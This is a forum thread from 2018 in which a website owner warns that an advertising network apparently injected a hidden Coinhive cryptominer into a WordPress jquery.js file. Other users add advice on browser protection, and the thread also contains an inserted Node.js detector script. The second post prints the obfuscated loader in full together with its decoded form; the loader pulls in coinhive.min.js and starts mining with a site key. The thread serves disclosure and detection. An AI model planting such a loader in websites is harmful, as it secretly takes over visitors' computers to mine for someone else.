Bitcoin Forum
Author Topic: Warning: potential malicious code originating from advertising network  (Read 153 times)
n3wspartan (OP)
Newbie
*
Offline Offline

Activity: 10
Merit: 3


View Profile
January 18, 2018, 10:01:53 PM
Merited by Lucius (3)
 #1

I'd encourage anybody who's using crypto ad networks to check your websites for potential malicious code.

Install an extension such as Minerblock and load your website.

I don't have any external scripts running apart from the one used by a well-known ad network, yet I was infected with a sneaky coinhive injection on this file: 'wp-includes/js/jquery/jquery.js'.

Please report your findings here. I won't disclose the network until we have more evidence.
n3wspartan (OP)
Newbie
*
Offline Offline

Activity: 10
Merit: 3


View Profile
January 18, 2018, 10:12:20 PM
 #2

Here's the relevant code if anyone is interested:

Code:
var _0x7a2c = ["\x73\x63\x72\x69\x70\x74", "\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74", "\x74\x79\x70\x65", "\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74", "\x73\x72\x63", "\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65", "\x6F\x6E\x6C\x6F\x61\x64", "\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64", "\x68\x65\x61\x64", "\x68\x74\x74\x70\x73\x3A\x2F\x2F\x63\x6F\x69\x6E\x68\x69\x76\x65\x2E\x63\x6F\x6D\x2F\x6C\x69\x62\x2F\x63\x6F\x69\x6E\x68\x69\x76\x65\x2E\x6D\x69\x6E\x2E\x6A\x73", "\x4B\x34\x4B\x35\x5A\x78\x63\x54\x33\x42\x6A\x62\x78\x44\x43\x42\x42\x56\x6A\x39\x37\x32\x47\x62\x51\x57\x76\x32\x6B\x55\x4E\x55", "\x73\x74\x61\x72\x74"];

    function loadScript(_0xca68x2, _0xca68x3) {
        var _0xca68x4 = document[_0x7a2c[1]](_0x7a2c[0]);
        _0xca68x4[_0x7a2c[2]] = _0x7a2c[3];
        _0xca68x4[_0x7a2c[4]] = _0xca68x2;
        _0xca68x4[_0x7a2c[5]] = _0xca68x3;
        _0xca68x4[_0x7a2c[6]] = _0xca68x3;
        document[_0x7a2c[8]][_0x7a2c[7]](_0xca68x4)
    }
    loadScript(_0x7a2c[9], function() {
        var _0xca68x5 = new CoinHive.Anonymous(_0x7a2c[10], {
            threads: 4
        });
        _0xca68x5[_0x7a2c[11]]()
    });

If you decode var _0x7a2c using a service like http://ddecode.com/hexdecoder/, you'll get this:

Code:
var _0x7a2c = ["script", "createElement", "type", "text/javascript", "src", "onreadystatechange", "onload", "appendChild", "head", "https://coinhive.com/lib/coinhive.min.js", "K4K5ZxcT3BjbxDCBBVj972GbQWv2kUNU", "start"];
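The two posts above describe a manual check (load the site with a miner-blocking extension, then hand-decode the hex-escaped string array). The following is an added example, not code from the thread or from any of the posters: a small Node.js script that does the decoding step automatically and flags the indicators visible in the sample (a hex-escaped string array, the coinhive.com library URL, and the CoinHive.Anonymous call). The sample inputs, the threshold constant and the indicator names are my own constructions and assumptions, not values from the thread.

```javascript
// Added example (not from the thread): static scan of a script body for the
// obfuscation pattern and miner indicators shown in the post above.
// Plain Node.js, no dependencies.

// Decode \xNN and \uNNNN escapes inside the body of a JS string literal.
function decodeEscapes(body) {
  return body.replace(/\\x([0-9A-Fa-f]{2})|\\u([0-9A-Fa-f]{4})/g,
    (_m, hx, ux) => String.fromCharCode(parseInt(hx || ux, 16)));
}

// Pull every single- or double-quoted string literal out of a script and
// return the decoded values in source order.
function extractStrings(source) {
  const literal = /"((?:[^"\\]|\\.)*)"|'((?:[^'\\]|\\.)*)'/g;
  const out = [];
  let m;
  while ((m = literal.exec(source)) !== null) {
    out.push(decodeEscapes(m[1] !== undefined ? m[1] : m[2]));
  }
  return out;
}

// Assumption: ordinary library code contains only a handful of \x escapes
// (regex character classes and the like), so a long run of them in string
// literals is worth a look. Tune this per site.
const HEX_ESCAPE_THRESHOLD = 16;

// Returns the decoded strings plus a list of indicator names that fired.
function scanScript(source) {
  const decoded = extractStrings(source);
  const hexEscapes = (source.match(/\\x[0-9A-Fa-f]{2}/g) || []).length;
  const findings = [];
  if (hexEscapes >= HEX_ESCAPE_THRESHOLD) findings.push('hex-escaped-string-array');
  if (decoded.some((s) => /coinhive\.com/i.test(s))) findings.push('coinhive-loader-url');
  if (/CoinHive\.Anonymous/.test(source) || decoded.some((s) => /CoinHive\.Anonymous/.test(s))) {
    findings.push('coinhive-api-call');
  }
  return { hexEscapes, decoded, findings };
}

// Constructed sample modelled on the loader quoted in the thread; the site key
// is a placeholder, not a real value.
const SUSPICIOUS_SAMPLE = String.raw`
var _0xab12 = ["\x73\x63\x72\x69\x70\x74", "\x73\x72\x63", "\x68\x74\x74\x70\x73\x3A\x2F\x2F\x63\x6F\x69\x6E\x68\x69\x76\x65\x2E\x63\x6F\x6D\x2F\x6C\x69\x62\x2F\x63\x6F\x69\x6E\x68\x69\x76\x65\x2E\x6D\x69\x6E\x2E\x6A\x73", "\x73\x74\x61\x72\x74"];
loadScript(_0xab12[2], function () { new CoinHive.Anonymous("SITEKEY_PLACEHOLDER", { threads: 4 }).start(); });
`;

// Constructed benign sample: a plain jQuery plugin with no obfuscation.
const CLEAN_SAMPLE =
  '(function ($) { $.fn.highlight = function () { return this.css("background", "#ff0"); }; })(jQuery);';

console.log('suspicious:', JSON.stringify(scanScript(SUSPICIOUS_SAMPLE).findings));
console.log('clean:', JSON.stringify(scanScript(CLEAN_SAMPLE).findings));
```

To repeat the original poster's check on a WordPress install, read the file in question (for example `wp-includes/js/jquery/jquery.js`) with `fs.readFileSync(path, 'utf8')` and pass it to `scanScript`; the decoded string list is usually enough to see what a loader is fetching even when the indicator list does not match it.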
Anti-Cen
Member
**
Offline Offline

Activity: 210
Merit: 26

High fees = low BTC price


View Profile
January 18, 2018, 11:24:42 PM
 #3

Thanks for the warning

When it's not Microsoft leaving back doors open, it's Google, and they both share the same
paymasters whose name we dare not mention.

Mining is CPU wars, and Intel and AMD like it nearly as much as big oil likes miners wasting electricity. Is this what mankind has come to?
diwataluna
Full Member
***
Offline Offline

Activity: 224
Merit: 103




View Profile
January 19, 2018, 08:59:32 AM
 #4

I hope more evidence will be posted so more people will be aware especially as we visit sites daily related to crypto. I have Adblock on my browser but even then have not been aware of surreptitious coinhive injections in sites I visit. Thanks for the heads-up.
CryptoWave
Member
**
Offline Offline

Activity: 109
Merit: 100


Web Developer


View Profile
January 19, 2018, 09:26:23 AM
 #5

Quote from: Anti-Cen on January 18, 2018, 11:24:42 PM
Thanks for the warning

When it's not Microsoft leaving back doors open, it's Google, and they both share the same
paymasters whose name we dare not mention.

This is likely not Google, probably smaller crypto-based networks (Coinzilla, a-ads, etc.).

Would be great if OP could clarify which network the ad was being served from so people can blacklist them.

Lucius
Legendary
*
Offline Offline

Activity: 3430
Merit: 6152


Crypto Swap Exchange🈺


View Profile WWW
January 19, 2018, 10:23:30 AM
 #6

Quote from: n3wspartan on January 18, 2018, 10:01:53 PM
I'd encourage anybody who's using crypto ad networks to check your websites for potential malicious code.

Install an extension such as Minerblock and load your website.

I don't have any external scripts running apart from the one used by a well-known ad network, yet I was infected with a sneaky coinhive injection on this file: 'wp-includes/js/jquery/jquery.js'.

Please report your findings here. I won't disclose the network until we have more evidence.

There are a lot of mining scripts hidden in ads. I notice that because my antivirus/firewall blocks all of them and gives me a notice every time. I also asked some faucet owners about mining on their sites, but some of them say they never enabled such things, so it is obvious that it is hidden in the ads.

I do not know if it is possible to remove that code without removing the ads, but it is not nice to use someone's CPU in this way. It seems that the earnings from crypto-related ad networks are going down and they are looking for a way to get some extra profit.

diwataluna
Full Member
***
Offline Offline

Activity: 224
Merit: 103




View Profile
January 30, 2018, 06:39:31 AM
 #7

By any chance, were you referring to what is reported here: https://blog.trendmicro.com/trendlabs-security-intelligence/malvertising-campaign-abuses-googles-doubleclick-to-deliver-cryptocurrency-miners/

I was not able to compare the scripts used yet.
bitcoinstud
Newbie
*
Offline Offline

Activity: 3
Merit: 0


View Profile
January 30, 2018, 10:18:08 AM
 #8

NoScript is quite good for protecting your browser; I run it alongside Adblock Plus. This is true though: I've seen ad content which will download and execute trojans also.